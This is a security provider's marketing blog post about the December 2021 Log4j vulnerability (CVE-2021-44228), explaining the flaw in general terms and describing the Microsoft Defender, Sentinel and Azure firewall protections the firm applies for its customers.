Posted on December 15, 2021
Estimated reading time 4 minutes
Hackers are making thousands of attempts to exploit your systems with a flaw in Log4j. The Log4j zero-day flaw has been hitting headlines and setting the internet on fire. The Log4j zero-day flaw is a vulnerability in a widely-used logging library that has had security responders work around the clock to patch as it is thought to affect many mainstream services.
What is Log4j?
A flaw in Log4j, a Java library for logging error messages in applications, is the most high-profile security vulnerability on the internet right now and comes with a severity score of 10 out of 10.
The library is developed by the open-source Apache Software Foundation and is a key Java-logging framework. It is widely used in many applications and is present in many services as a dependency. This includes enterprise applications, including custom applications developed within an organisation, as well as numerous cloud services.
An application is vulnerable if it consumes untrusted user input and passes this to a vulnerable version of the Log4j logging library.
What is Atech doing to protect its customers against Log4j?
- For Customers that have Microsoft Defender Anti-Virus
We always ensure we turn on cloud-delivered protection in Microsoft Defender Antivirus to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block the majority of new and unknown variants.
Microsoft Defender Antivirus detects components and behaviours related to this threat.
- For Customers that have Defender for Cloud
Microsoft Defender for Cloud detects exploitation and post-exploitation activity related to CVE-2021-44228. This will then block and prevent any attacker trying to breach and compromise your organisations security.
We have added the CVE number into the Inventory tools available in Defender for Cloud and are running searches against all managed devices within the organisation to search for this exploit.
- For Customers with Microsoft Sentinel
We proactively run queries that look for the exploit and help us detect any attempts so we can block or prevent this sort of attacks in your organisation.
These hunting queries look for possible attempts to exploit a remote code execution vulnerability in the Log4j component of Apache. Attackers may attempt to launch arbitrary code by passing specific commands to a server, which are then logged and executed by the Log4j component.
- For Customers with Azure Firewall Premium
The good news is that customers using Azure Firewall Premium have enhanced protection from the Log4j RCE CVE-2021-44228 vulnerability and exploit.
Azure Firewall premium IDPS (Intrusion Detection and Prevention System) provides IDPS inspection for all east-west traffic and outbound traffic to internet.
The vulnerability rulesets are continuously updated by Microsoft and include CVE-2021-44228 vulnerability for different scenarios including UDP, TCP, HTTP/S protocols since December 10th, 2021.
- For Customers with Azure Web Application Firewall (WAF)
In response to this threat, Azure Web Application Firewall (WAF) has updated Default Rule Set (DRS) versions 1.0 and 1.1, which are available for Azure Front Door global deployments.
Microsoft have updated rule 944240 “Remote Command Execution” under Managed Rules to help in detecting and mitigating this vulnerability by inspecting requests’ headers, URI, and body. This rule is already enabled by default in block mode for all existing WAF Default Rule Set configurations.
Customers using WAF Managed Rules would have already received enhanced protection for the Log4j2 vulnerability (CVE-2021-44228), no additional action is needed.
Atech, as a Security solutions provider has proactively audited internal systems and customer environments to take action where required and ensure no customers are exposed to this vulnerability.
Our recommendation for Log4j
Are you still worried about your security posture?
If you are not already using the Microsoft 365 Defender Suite to protect your organisation, don’t wait any longer. Reach out to us and we will help you to design and implement military-grade security in your business using industry-leading solutions backed by our tailor-made service.